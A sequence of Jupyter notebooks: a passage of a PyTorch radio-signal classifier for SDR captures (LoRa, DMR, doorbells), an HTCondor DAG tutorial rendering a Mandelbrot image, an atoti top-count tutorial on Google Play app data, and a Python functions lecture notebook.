fig=plt.figure(figsize=(8,8)) # ncols = 5 # nrows = 5 # range_plot = 1 # for x in range(1,22): # need to figure out how to not hard code this ********************* <----- # stft_mean, stft_std = histo_stats(stft_plot[x,:,:,:]) # if (x>=range_plot and x<(range_plot+25)): # stft_plot1 = 10*np.log10(np.abs(stft_plot[x, :, :, 0]+eps)) # stft_plot1 = np.squeeze(stft_plot1, axis=0) # fig.add_subplot(nrows, ncols, x-range_plot+1) # plt.imshow(stft_plot1, vmin=-70, vmax=5) # plt.show() #****************************************************************************************** freq_increment = (Fs*msps/2)/seg_freq.detach().cpu().numpy().item() print('freq_increment = ', freq_increment) print('TESTING inputs SHAPE = ', inputs.shape) target = Variable(target.cuda(GPU)) print('input in = ', inputs.shape) inputs = torch.squeeze(inputs, dim=0) print('input out = ', inputs.shape) inputs = inputs.permute(0,3,1,2).contiguous() print('counter convert stuff = ', counter, type(counter.numpy())) inputs = Variable(inputs.cuda(GPU)) print('permuted shape = ', inputs.shape) freq_count = 0 # keep track of array position freq_histo = np.zeros(counter.numpy()) for j in range(counter): inputs2 = inputs[j,:,:,:] inputs2 = torch.unsqueeze(inputs2,0) outputs = model(inputs2) _, predicted = torch.max(outputs.data, 1) #******************************* Print prediction range to match pics above *********** # if (j>=range_plot and j<(range_plot+25)): # print("j= ",j,' ',outputs.data.detach().cpu().numpy()) # print('prediction = ', predicted.detach().cpu().numpy()) #************************************************************************************* total = total +1 # Increment the total count match_freq = match_freq + freq_offset*freq_increment if (predicted.detach().cpu().numpy() == 0): c0 = c0 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 1): c1 = c1 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 2): c2 = c2 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 3): c3 = c3 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 4): c4 = c4 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 5): c5 = c5 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 6): c6 = c6 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 7): c7 = c7 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 8): noise = noise + 1 if (predicted.detach().cpu().numpy() == 9): center_fft = center_fft + 1 if (predicted.detach().cpu().numpy() == 10): c8 = c8 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 11): c9 = c9 + 1 freq_histo[j] = match_freq/1000000 freq_offset = freq_offset + 1 if (freq_offset == seg_freq): freq_offset = 0 match_freq = start_frequency torch.cuda.empty_cache() # complete ****************************************************** freq_histo = np.ma.masked_equal(freq_histo, 0) histo_stats_freq_file(freq_histo,msps) denom = total-center_fft-noise print('************************* Probabilities ********************************') print('----------------------------WAVEFORMS-----------------------------------') if (denom == 0): print('Nothing but noise') else: print('LoRa 125 = {:.2f}%'.format(c0/denom*100)) print('GD55 DMR = {:.2f}%'.format(c1/denom*100)) print('NFM = {:.2f}%'.format(c2/denom*100)) print('TYT = {:.2f}'.format(c3/denom*100)) print('Vodeson Doorbell = {:.2f}%'.format(c4/denom*100)) print('clickndig = {:.2f}%'.format(c5/denom*100)) print('Sado doorbell = {:.2f}%'.format(c6/denom*100)) print('LoRa 250 = {:.2f}%'.format(c7/denom*100)) print('light switch = {:.2f}%'.format(c8/denom*100)) print('YSF = {:.2f}%'.format(c9/denom*100)) print('------------------------------------------------------------------------') print('***************************** noise and fft ****************************') print('noise matches = ', noise) print('center fft matches = ', center_fft) print('TOTAL patch count = ', total) print('***************************** Finished *********************************') # inference ************************************************************ def testing_live(msps): large_width = 400 np.set_printoptions(precision=2,floatmode='fixed', linewidth=large_width) model.eval() V = data.DataLoader(inference_dataloader_segmented(), batch_size=1) start_frequency = (center_freq_live) match_freq = start_frequency print('start_frequency = ', start_frequency/1000000) freq_offset = 0 total = noise = center_fft = target_to_int = accumulated_corrects = percent_correct = 0 c0 = c1 = c2 = c3 = c4 = c5 = c6 = c7 = c8 = c9 = 0 with torch.no_grad(): for i, rf_data in enumerate(V, 0): accumulated_corrects = 0 percent_correct = 0 target_to_int = 0 inputs, target, counter, seg_freq = rf_data print('testing counter = ', counter, 'seg_freq =', seg_freq) print('seg_freq = ', seg_freq) #**************************** Print segmented pics *********************************** stft_plot = np.squeeze(inputs, axis=0) fig=plt.figure(figsize=(8,8)) ncols = 5 nrows = 5 range_plot = 1 range_end = range_plot+5 for x in range(1,51): # need to figure out how to not hard code this ********************* <----- if (x>=range_plot and x<(range_end)): stft_plot1 = stft_plot[x, :, :, 1] stft_plot1 = 10*np.log10(np.abs(stft_plot[x, :, :, 0]+eps)) fig.add_subplot(nrows, ncols, x-range_plot+1) plt.imshow(stft_plot1, vmin=-70, vmax=5) plt.show() #****************************************************************************************** freq_increment = (Fs*msps/2)/seg_freq.detach().cpu().numpy().item() print('freq_increment = ', freq_increment) print('TESTING inputs SHAPE = ', inputs.shape) target = Variable(target.cuda(GPU)) print('input in = ', inputs.shape) inputs = torch.squeeze(inputs, dim=0) print('input out = ', inputs.shape) inputs = inputs.permute(0,3,1,2).contiguous() print('counter convert stuff = ', counter, type(counter.numpy())) inputs = Variable(inputs.cuda(GPU)) print('permuted shape = ', inputs.shape) freq_count = 0 # keep track of array position freq_histo = np.zeros(counter.numpy()) for j in range(counter): inputs2 = inputs[j,:,:,:] inputs2 = torch.unsqueeze(inputs2,0) outputs = model(inputs2) _, predicted = torch.max(outputs.data, 1) #******************************* Print prediction range to match pics above *********** # if (j>=range_plot and j<(range_end)): # # print("j= ",j,' ',outputs.data.detach().cpu().numpy()) # print('prediction = ', predicted.detach().cpu().numpy()) # print('******************') #************************************************************************************* total = total +1 # Increment the total count match_freq = match_freq + freq_offset*freq_increment if (predicted.detach().cpu().numpy() == 0): c0 = c0 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 1): c1 = c1 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 2): c2 = c2 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 3): c3 = c3 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 4): c4 = c4 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 5): c5 = c5 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 6): c6 = c6 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 7): c7 = c7 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 8): noise = noise + 1 if (predicted.detach().cpu().numpy() == 9): center_fft = center_fft + 1 if (predicted.detach().cpu().numpy() == 10): c8 = c8 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 11): c9 = c9 + 1 freq_histo[j] = match_freq/1000000 freq_offset = freq_offset + 1 if (freq_offset == seg_freq): freq_offset = 0 match_freq = start_frequency torch.cuda.empty_cache() # complete ****************************************************** freq_histo = np.ma.masked_equal(freq_histo, 0) histo_stats_freq_live(freq_histo,msps) denom = total-center_fft-noise print('************************* Probabilities ********************************') print('----------------------------WAVEFORMS-----------------------------------') if (denom == 0): print('Nothing but noise') else: print('LoRa 125 = {:.2f}%'.format(c0/denom*100)) print('GD55 DMR = {:.2f}%'.format(c1/denom*100)) print('NFM = {:.2f}%'.format(c2/denom*100)) print('TYT = {:.2f}'.format(c3/denom*100)) print('Vodeson Doorbell = {:.2f}%'.format(c4/denom*100)) print('clickndig = {:.2f}%'.format(c5/denom*100)) print('Sado doorbell = {:.2f}%'.format(c6/denom*100)) print('LoRa 250 = {:.2f}%'.format(c7/denom*100)) print('light switch = {:.2f}%'.format(c8/denom*100)) print('YSF = {:.2f}%'.format(c9/denom*100)) print('------------------------------------------------------------------------') print('***************************** noise and fft ****************************') print('noise matches = ', noise) print('center fft matches = ', center_fft) print('TOTAL patch count = ', total) print('***************************** Finished *********************************') train_dataloader = RFDataset(path) training_data = data.DataLoader(train_dataloader, batch_size=batches, shuffle=True) ``` ## CUDA initialization ``` model = VGG_net() CUDA = torch.cuda.is_available() if CUDA: model.cuda(GPU) CUDA torch.cuda.empty_cache() ``` ## Final training initialization ``` # momentum = .3 criterion = nn.CrossEntropyLoss() lr= 1e-5 optimizer = optim.AdamW(model.parameters(), lr=lr) # optimizer = optim.SGD(model.parameters(), lr=lr,momentum=momentum) # optimizer = optim.RMSprop(model.parameters(), lr=lr,momentum=momentum) # optimizer = optim.SGD(model.parameters(), lr=lr) # training_data = data.DataLoader(rf_dataset, batch_size=batches, shuffle=True) model.train() # VALIDATION ************************************************************ np.set_printoptions(threshold=np.inf) calc = np.zeros([6]) averaging = 0 correct = 0 total = 0 V = data.DataLoader(inference_dataloader_segmented(), batch_size=1, shuffle=True) model.eval() ``` ### TRAIN Model ``` total = 100 loss_plot,total_plot = train_net(total) path_plot_fig = "/home/david/sigMF_ML/RF/RF_class/plot_data/" # ACE os.chdir(path_plot_fig) # # num = 20 np.save('vgg16_2D_plot_1e5', np.asarray(total_plot)) # np.save('vgg16_2D_plot_10dB_2_20210227', total_plot) path_plot_fig = "/home/david/sigMF_ML/RF/RF_class/plot_data/" # ACE os.chdir(path_plot_fig) resnet50_2D = np.load('resnet50_2D_20210227_1e4lr_10dB.npy') resnet50_4D = np.load('resnet50_4D_1e4lr_20210227.npy') resnet18_4D = np.load('resnet18_4D_1e4lr_20210227.npy') resnet18_2D = np.load('resnet18_2D_20210227_10dB_1e4lr.npy') vgg16_4D = np.load('VGG16_4D_plot_20210226.npy') vgg16_2D = np.load('vgg16_2D_plot_10dB_20210227.npy') # path_plot_fig = "/home/david/sigMF_ML/RF/RF_class/plot_data/" # ACE # os.chdir(path_plot_fig) # np.save('vgg16_4D_plot_10dB_longarray', np.asarray(vgg16_4D_956)) np.amax(vgg16_2D) vgg16_2D.shape np.amax(resnet50_4D) resnet50_4D.shape np.amax(resnet50_2D) resnet50_2D.shape np.amax(resnet18_4D) resnet18_4D.shape np.amax(resnet18_2D) resnet18_2D.shape # num = len(resnet50_4D) # reduced rank by 1 for matrix math to work out ymin = 80 ymax = 100 num = 100 x = np.arange(0,num,1) # Start at index position 1 plt.figure(figsize=(9, 6)) fig2 = plt.figure() # plt.plot(x[1:num],resnet18_4D[1:num], c='#1f77b4',markersize=1, linewidth=.5,markerfacecolor='#1f77b4',markeredgecolor='#1f77b4',markeredgewidth=1,label='ResNet18 4D') # plt.plot(x[1:num],resnet18_2D[1:num], c='#ff7f0e',markersize=1, linewidth=.5,markerfacecolor='#ff7f0e',markeredgecolor='#ff7f0e',markeredgewidth=1, label='ResNet18 2D') # plt.plot(x[1:num],vgg16_4D[1:num], c='#2ca02c', markersize=1, linewidth=.5,markerfacecolor='#2ca02c',markeredgecolor='#2ca02c',markeredgewidth=1, label='VGG16 4D') plt.plot(x[1:num],resnet50_2D[1:num], c='#d62728', markersize=1, linewidth=.5,markerfacecolor='#d62728',markeredgecolor='#d62728',markeredgewidth=1, label='ResNet50 2D') # plt.plot(x[1:num],resnet50_4D[1:num], c='#9467bd', markersize=1, linewidth=.5,markerfacecolor='#9467bd',markeredgecolor='#9467bd',markeredgewidth=1, label='ResNet50 4D') # plt.plot(x[1:num],vgg16_2D[1:num], c='#8c564b', markersize=1, linewidth=.5,markerfacecolor='#8c564b',markeredgecolor='#8c564b',markeredgewidth=2, label='VGG16 2D') plt.legend(loc='lower right') axes = plt.gca() # Get the Current Axis, create one, if necessary xmin = 0 xmax = 100 axes.set_xlim([xmin,xmax]) axes.set_ylim([ymin,ymax]) # '-o' '-X' '-P' '-D' '-^' '-*' plt.title('Validation accuracy resnet50_2ch') plt.xlabel('Iteration/100') plt.ylabel('% accuracy') plt.grid() # plt.minorticks_on() # plt.yticks(np.arange(70,80,90,100.01)) plt.xticks([0, 25, 50, 75, 100]) fig2.savefig('resnet50_2ch.pdf', format="pdf") plt.show() os.chdir(path_fig) plt.figure(figsize=(9, 6)) fig = plt.figure() plt.plot(loss_plot,c='r', label='Loss curve') plt.legend(loc='upper right') plt.title('Loss vs Epochs') plt.xlabel('Epochs') plt.ylabel('Loss') plt.grid() fig.savefig('RF_class_v50_loss_4D.pdf', format="pdf") plt.show() ``` ### LIVE inferencing ``` # !python3 /home/david/sigMF_ML/gnuradio/record_live.py ``` #### 2D tensor with 300 noise vodeson - 10 lora250 - 0 lora125 - click - 10 sado - 4ish light - tyt - GD55 nfm - ### TESTING ``` msps = 25 center_freq_live = 428.0e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 !python3 /home/david/sigMF_ML/gnuradio/record_live_25msps.py # !python3 /home/david/sigMF_ML/gnuradio/record_live1msps.py # usrp_data_collect_1MSPS() data_IQ_list_val, meta_list_val = inference_read(msps) testing_live(msps) torch.cuda.empty_cache() msps = 5 center_freq_live = 433.0e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 !python3 /home/david/sigMF_ML/gnuradio/record_live_5msps.py # !python3 /home/david/sigMF_ML/gnuradio/record_live1msps.py # usrp_data_collect_1MSPS() data_IQ_list_val, meta_list_val = inference_read(msps) testing_live(msps) torch.cuda.empty_cache() msps = 1 center_freq_live = 433.65e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 # !python3 /home/david/sigMF_ML/gnuradio/record_live25msps.py !python3 /home/david/sigMF_ML/gnuradio/record_live_1msps.py # usrp_data_collect_1MSPS() data_IQ_list_val, meta_list_val = inference_read(msps) testing_live(msps) torch.cuda.empty_cache() torch.cuda.empty_cache() ``` ## testing pre-recorded files in /home/david/sigMF_ML/RF/RF_class/testing_data ``` msps = 25 center_freq_file = 428.00e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 data_IQ_list_val, meta_list_val = inference_read_file(msps, path_test_25msps) testing_file(msps) torch.cuda.empty_cache() msps = 5 center_freq_file = 433.00e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 data_IQ_list_val, meta_list_val = inference_read_file(msps, path_test_5msps) testing_file(msps) torch.cuda.empty_cache() msps = 1 center_freq_file = 433.65e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 data_IQ_list_val, meta_list_val = inference_read_file(msps, path_test_1msps) testing_file(msps) torch.cuda.empty_cache() torch.cuda.empty_cache() ``` #### Save and Load model data ``` rf_model = 'ResNet50_v56_2D_20210208_100noise' PATH = path_save+rf_model ``` #### save ``` # torch.save(model.state_dict(), PATH) ``` #### load ``` # device = torch.device("cuda:0") # model = resnet50(2, 12) # model.load_state_dict(torch.load(PATH)) # model.to(device) # model.eval() # # Print model's state_dict # print("Model's state_dict:") # for param_tensor in model.state_dict(): # print(param_tensor, "\t", model.state_dict()[param_tensor].size()) # # Print optimizer's state_dict # print("Optimizer's state_dict:") # for var_name in optimizer.state_dict(): # print(var_name, "\t", optimizer.state_dict()[var_name]) # # SAVE MODEL # os.chdir(path_save) # torch.save({ # 'epoch': epoch, # 'model_state_dict': model.state_dict(), # 'optimizer_state_dict': optimizer.state_dict(), # 'loss': loss, # }, path_save+rf_model) # # LOAD MODEL # checkpoint = torch.load(path_save+rf_model, map_location=device) # # STATUS # checkpoint.keys() # epoch = checkpoint['epoch'] # model_state_dict = checkpoint['model_state_dict'] # optimizer_state_dict = checkpoint['optimizer_state_dict'] # loss = checkpoint['loss'] # optimizer_state_dict.keys() # optimizer_state_dict['param_groups'] # loss # model.load_state_dict(model_state_dict) # loss # optimizer_state_dict.keys() ```
github_jupyter
# DAG Creation and Submission Launch this tutorial in a Jupyter Notebook on Binder: [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/htcondor/htcondor-python-bindings-tutorials/master?urlpath=lab/tree/DAG-Creation-And-Submission.ipynb) In this tutorial, we will learn how to use `htcondor.dags` to create and submit an HTCondor DAGMan workflow. Our goal will be to create an image of the Mandelbrot set. This is a perfect problem for high-throughput computing because each point in the image can be calculated completely independently of any other point, so we are free to divide the image creation up into patches, each created by a single HTCondor job. DAGMan will enter the picture to coordinate stitching the image patches we create back into a single image. ## Making a Mandelbrot set image locally We'll use `goatbrot` (https://github.com/beejjorgensen/goatbrot) to make the image. `goatbrot` can be run from the command line, and takes a series of options to specify which part of the Mandelbrot set to draw, as well as the properties of the image itself. `goatbrot` options: - `-i 1000` The number of iterations. - `-c 0,0` The center point of the image region. - `-w 3` The width of the image region. - `-s 1000,1000` The pixel dimensions of the image. - `-o test.ppm` The name of the output file to generate. We can run a shell command from Jupyter by prefixing it with a `!`: ``` ! ./goatbrot -i 10 -c 0,0 -w 3 -s 500,500 -o test.ppm ! convert test.ppm test.png ``` Let's take a look at the test image. It won't be very good, because we didn't run for very many iterations. We'll use HTCondor to produce a better image! ``` from IPython.display import Image Image('test.png') ``` ## What is the workflow? We can parallelize this calculation by drawing rectangular sub-regions of the full region ("tiles") we want and stitching them together into a single image using `montage`. Let's draw this out as a graph, showing how data (image patches) will flow through the system. (Don't worry about this code, unless you want to know how to make dot diagrams in Python!) ``` from graphviz import Digraph import itertools num_tiles_per_side = 2 dot = Digraph() dot.node('montage') for x, y in itertools.product(range(num_tiles_per_side), repeat = 2): n = f'tile_{x}-{y}' dot.node(n) dot.edge(n, 'montage') dot ``` Since we can chop the image up however we'd like, we have as many tiles per side as we'd like (try changing `num_tiles_per_side` above). The "shape" of the DAG is the same: there is a "layer" of `goatbrot` jobs that calculate tiles, which all feed into `montage`. Now that we know the structure of the problem, we can start describing it to HTCondor. ## Describing `goatbrot` as an HTCondor job We describe a job using a `Submit` object. It corresponds to the submit *file* used by the command line tools. It mostly behaves like a standard Python dictionary, where the keys and values correspond to submit descriptors. ``` import htcondor tile_description = htcondor.Submit( executable = 'goatbrot', # the program we want to run arguments = '-i 10000 -c $(x),$(y) -w $(w) -s 500,500 -o tile_$(tile_x)-$(tile_y).ppm', # the arguments to pass to the executable log = 'mandelbrot.log', # the HTCondor job event log output = 'goatbrot.out.$(tile_x)_$(tile_y)', # stdout from the job goes here error = 'goatbrot.err.$(tile_x)_$(tile_y)', # stderr from the job goes here request_cpus = '1', # resource requests; we don't need much per job for this problem request_memory = '128MB', request_disk = '1GB', ) print(tile_description) ``` Notice the heavy use of macros like `$(x)` to specify the tile. Those aren't built-in submit macros; instead, we will plan on passing their values in through **vars**. Vars will let us customize each individual job in the tile layer by filling in those macros individually. Each job will recieve a dictionary of macro values; our next goal is to make a list of those dictionaries. We will do this using a function that takes the number of tiles per side as an argument. As mentioned above, the **structure** of the DAG is the same no matter how "wide" the tile layer is. This is why we define a function to produce the tile vars instead of just calculating them once: we can vary the width of the DAG by passing different arguments to `make_tile_vars`. More customizations could be applied to make different images (for example, you could make it possible to set the center point of the image). ``` def make_tile_vars(num_tiles_per_side, width = 3): width_per_tile = width / num_tiles_per_side centers = [ width_per_tile * (n + 0.5 - (num_tiles_per_side / 2)) for n in range(num_tiles_per_side) ] vars = [] for (tile_y, y), (tile_x, x) in itertools.product(enumerate(centers), repeat = 2): var = dict( w = width_per_tile, x = x, y = -y, # image coordinates vs. Cartesian coordinates tile_x = str(tile_x).rjust(5, '0'), tile_y = str(tile_y).rjust(5, '0'), ) vars.append(var) return vars tile_vars = make_tile_vars(2) for var in tile_vars: print(var) ``` If we want to increase the number of tiles per side, we just pass in a larger number. Because the `tile_description` is **parameterized** in terms of these variables, it will work the same way no matter what we pass in as `vars`. ``` tile_vars = make_tile_vars(4) for var in tile_vars: print(var) ``` ## Describing montage as an HTCondor job Now we can write the `montage` job description. The problem is that the arguments and input files depend on how many tiles we have, which we don't know ahead-of-time. We'll take the brute-force approach of just writing a function that takes the tile `vars` we made in the previous section and using them to build the `montage` job description. Not that some of the work of building up the submit description is done in Python. This is a major advantage of communicating with HTCondor via Python: you can do the hard work in Python instead of in submit language! One area for possible improvement here is to remove the duplication of the format of the input file names, which is repeated here from when it was first used in the `goatbrot` submit object. When building a larger, more complicated workflow, it is important to reduce duplication of information to make it easier to modify the workflow in the future. ``` def make_montage_description(tile_vars): num_tiles_per_side = int(len(tile_vars) ** .5) input_files = [f'tile_{d["tile_x"]}-{d["tile_y"]}.ppm' for d in tile_vars] return htcondor.Submit( executable = '/usr/bin/montage', arguments = f'{" ".join(input_files)} -mode Concatenate -tile {num_tiles_per_side}x{num_tiles_per_side} mandelbrot.png', transfer_input_files = ', '.join(input_files), log = 'mandelbrot.log', output = 'montage.out', error = 'montage.err', request_cpus = '1', request_memory = '128MB', request_disk = '1GB', ) montage_description = make_montage_description(make_tile_vars(2)) print(montage_description) ``` ## Describing the DAG using `htcondor.dags` Now that we have the job descriptions, all we have to do is use `htcondor.dags` to tell DAGMan about the dependencies between them. `htcondor.dags` is a subpackage of the HTCondor Python bindings that lets you write DAG descriptions using a higher-level language than raw DAG description file syntax. Incidentally, it also lets you use Python to drive the creation process, increasing your flexibility. **Important Concept:** the code from `dag = dags.DAG()` onwards only defines the **topology** (or **structure**) of the DAG. The `tile` layer can be flexibly grown or shrunk by adjusting the `tile_vars` without changing the topology, and this can be clearly expressed in the code. The `tile_vars` are driving the creation of the DAG. Try changing `num_tiles_per_side` to some other value! ``` from htcondor import dags num_tiles_per_side = 2 # create the tile vars early, since we need to pass them to multiple places later tile_vars = make_tile_vars(num_tiles_per_side) dag = dags.DAG() # create the tile layer, passing in the submit description for a tile job and the tile vars tile_layer = dag.layer( name = 'tile', submit_description = tile_description, vars = tile_vars, ) # create the montage "layer" (it only has one job in it, so no need for vars) # note that the submit description is created "on the fly"! montage_layer = tile_layer.child_layer( name = 'montage', submit_description = make_montage_description(tile_vars), ) ``` We can get a textual description of the DAG structure by calling the `describe` method: ``` print(dag.describe()) ``` ## Write the DAG to disk We still need to write the DAG to disk to get DAGMan to work with it. We also need to move some files around so that the jobs know where to find them. ``` from pathlib import Path import shutil dag_dir = (Path.cwd() / 'mandelbrot-dag').absolute() # blow away any old files shutil.rmtree(dag_dir, ignore_errors = True) # make the magic happen! dag_file = dags.write_dag(dag, dag_dir) # the submit files are expecting goatbrot to be next to them, so copy it into the dag directory shutil.copy2('goatbrot', dag_dir) print(f'DAG directory: {dag_dir}') print(f'DAG description file: {dag_file}') ``` ## Submit the DAG via the Python bindings Now that we have written out the DAG description file, we can submit it for execution using the standard Python bindings submit mechanism. The `Submit` class has a static method which can read a DAG description and generate a corresponding `Submit` object: ``` dag_submit = htcondor.Submit.from_dag(str(dag_file), {'force': 1}) print(dag_submit) ``` Now we can enter the DAG directory and submit the DAGMan job, which will execute the graph: ``` import os os.chdir(dag_dir) schedd = htcondor.Schedd() with schedd.transaction() as txn: cluster_id = dag_submit.queue(txn) print(f"DAGMan job cluster is {cluster_id}") os.chdir('..') ``` Let's wait for the DAGMan job to complete by reading it's event log: ``` dag_job_log = f"{dag_file}.dagman.log" print(f"DAG job log file is {dag_job_log}") # read events from the log, waiting forever for the next event dagman_job_events = htcondor.JobEventLog(str(dag_job_log)).events(None) # this event stream only contains the events for the DAGMan job itself, not the jobs it submits for event in dagman_job_events: print(event) # stop waiting when we see the terminate event if event.type is htcondor.JobEventType.JOB_TERMINATED and event.cluster == cluster_id: break ``` Let's look at the final image! ``` Image(dag_dir / "mandelbrot.png") ```
github_jupyter
# Ways to visualize top count with atoti Given different categories of items, we will explore how to achieve the following with atoti: - Visualize top 10 apps with the highest rating in table - Visualize top 10 categories with most number of apps rated 5 in Pie chart - Visualize top 10 apps for each category in subplots See [pandas.ipynb](pandas.ipynb) to see how we can achieve the similar top count with Pandas. __Note on data:__ We are using the [Google Play Store Apps data](https://www.kaggle.com/lava18/google-play-store-apps) from Kaggle. Data has been processed to convert strings with millions and thousands abbreviations into numeric data. <div style="text-align:center"><a href="https://www.atoti.io/?utm_source=gallery&utm_content=top-count" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover.png" alt="atoti table" /></a></div> ## Top count with atoti ``` import atoti as tt session = tt.create_session(config={"user_content_storage": "./content"}) playstore = session.read_csv( "s3://data.atoti.io/notebooks/topcount/googleplaystore_cleaned.csv", table_name="playstore", keys=["App", "Category", "Genres", "Current Ver"], types={"Reviews": tt.type.FLOAT, "Installs": tt.type.FLOAT}, process_quotes=True, ) playstore.head() cube = session.create_cube(playstore, "Google Playstore") cube.schema ``` ### Top 10 apps with highest rating across categories Use the content editor to apply a top count filter on the pivot table. ``` session.visualize("Top 10 apps with highest rating across categories") ``` ### Top 10 categories with the most number of apps rated 5 ``` h, l, m = cube.hierarchies, cube.levels, cube.measures m ``` #### Number of apps rated 5 Create a measure that counts the number of apps rated 5 within categories and at levels below the category. ``` m["Count with rating 5"] = tt.agg.sum( tt.where(m["Rating.MEAN"] == 5, m["contributors.COUNT"], 0), scope=tt.scope.origin(l["Category"], l["App"]), ) ``` We can drill down to different levels from category and the count is computed on the fly. ``` session.visualize("Categories with apps rated 5") ``` Apply top count filter from **atoti editor** on the category by the `Count with rating 5` measure. The atoti editor is the atoti's Jupyterlab extension on the right with the <img src="https://data.atoti.io/notebooks/topcount/atoti_editor.png" alt="a." width="50"> icon. ``` session.visualize("Top 10 categories with most number of apps rated 5") ``` ### Top 10 apps for each category Since we are performing top 10 apps filtering for each category, it's only right that we classify `App` under `Category`. In this case, we create a multi-level hierarchy such as the following: ``` h["App Categories"] = [l["Category"], l["App"]] h ``` This structure allows us to select at which level we want to apply the top count on in a multilevel hierarchy from the atoti editor. <img src="https://data.atoti.io/notebooks/topcount/filter_by_category.png" alt="Filter by level" width="30%"> ``` session.visualize("Top 10 apps with highest rating for each category") ``` #### Creating subplot to visualize top count per category Again, go to the atoti's Jupyterlab extension and add `Category` level to the subplot section. <img src="https://data.atoti.io/notebooks/topcount/subplot_controls.png" alt="create subplot" width="30%"> Slice the pie chart is by `Apps` and apply filter on `App` level of the `App Categories` ``` session.visualize("Top 10 apps within each categories") ``` You can use the filter to select the categories that you want to view. Alternative, use `session.url` to access the web application to build an interactive dashboard with quick filters. Check out the link below. ``` session.link(path="/#/dashboard/767") ``` <div style="text-align:center"><a href="https://www.atoti.io/?utm_source=gallery&utm_content=top-count" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover-try.png" alt="atoti table" /></a></div>
github_jupyter
## Reading/writing files ### BIOINF 575 - Fall 2020 ### Functions recap - important functions continued #### RECAP & RESOURCES #### RECAP ```python # FUNCTIONS # DEFINITION - creating a function def function_name(arg1, arg2, darg=None): # instructions to compute result return result # CALL - running a function function_result = function_name(val1, val2, dval) ``` * <b>A function doesn't need to have arguments to work</b> * <b>`return` statments exit the function while passing on the data</b> * <b>if there is no `return` statement None is returned</b> * <b>Defining a function does not run a function. </b> * <b>To run a function, it must be called using `([args])` after the function name</b> ```python function_name(val1, val2, [dval]) ``` #### RESOURCES FUNCTIONS https://docs.python.org/3/tutorial/introduction.html https://docs.python.org/3/library/functions.html https://www.python.org/dev/peps/pep-0257/ https://www.tutorialspoint.com/python3/python_functions.htm https://www.geeksforgeeks.org/functions-in-python/ https://github.com/Pierian-Data/Complete-Python-3-Bootcamp/tree/master/03-Methods%20and%20Functions READING & WRITING FILES https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files https://www.tutorialspoint.com/python/python_files_io.htm https://www.geeksforgeeks.org/reading-writing-text-files-python/ https://www.w3schools.com/python/python_file_write.asp https://www.python-course.eu/python3_file_management.php https://colab.research.google.com/github/computationalcore/introduction-to-python/blob/master/notebooks/4-files/PY0101EN-4-1-ReadFile.ipynb https://github.com/aushafy/Python-Write-and-Read-File https://eeob-biodata.github.io/BCB546X-Fall2017/Week_09/additional-lesson/ --- ### Function Examples ___ ##### <b>`*args`</b> - unkown no. of arguments - unpack collection of argument values ##### <b>`**kargs`</b> - unkown no. of arguments - unpack mapping of names and values ``` x = 20 print(*("EGFR", "TP53", "AAACGTTA", 30, [x, 60])) print("EGFR", "TP53", "AAACGTTA", 30, [x, 60]) def test_karg(**keys_args_dict): for name,value in keys_args_dict.items(): print("name = ", name) print("value = ", value) test_karg(**{"gene":"EGFR", "expression": 20,"transcript_no": 4}) test_karg(gene = "EGFR", expression = 20, transcript_no = 4) ``` ___ ##### <b>`Recursive`</b> function - function that calls itself ``` test_list = ["CGTA", "CCCT", "GGGA", "ACGG"] def display_elements(seq_list, pos): if pos <= len(seq_list)-1: print(seq_list[pos]) display_elements(seq_list, pos + 1) display_elements(test_list, 0) ``` ____ ##### <b>`lambda` function</b> - anonymous function - it has no name Should be used only with simple expressions https://docs.python.org/3/reference/expressions.html#lambda<br> https://www.geeksforgeeks.org/python-lambda-anonymous-functions-filter-map-reduce/<br> https://realpython.com/python-lambda/<br> `lambda arguments : expression` A lambda function can take <b>any number of arguments<b>, but must always have <b>only one expression</b>. ``` compute_expression = lambda x, y: x + y + x*y compute_expression(2, 3) ``` ____ ### Useful functions #### Built-in functions https://docs.python.org/3/library/functions.html ##### <b>`zip(*iterables)`</b> - make an iterator that aggregates respective elements from each of the iterables. https://docs.python.org/3/library/functions.html#zip ##### <b>`map(function, iterable, ...)`</b> - apply function to every element of an iterable - return iterable with results https://docs.python.org/3/library/functions.html#map ##### <b>`filter(function, iterable)`</b> - apply function (bool result) to every element of an iterable - return the elements from the input iterable for which the function returns True https://docs.python.org/3/library/functions.html#filter ##### <b>`functools.reduce(function, iterable[, initializer])`</b> - apply function to every element of an iterable to reduce the iterable to a single value https://docs.python.org/3/library/functools.html#functools.reduce ``` combined_res = zip([10,20,30],["ACT","GGT","AACT"],[True,False,True]) combined_res for element in combined_res: print(element) list(combined_res) 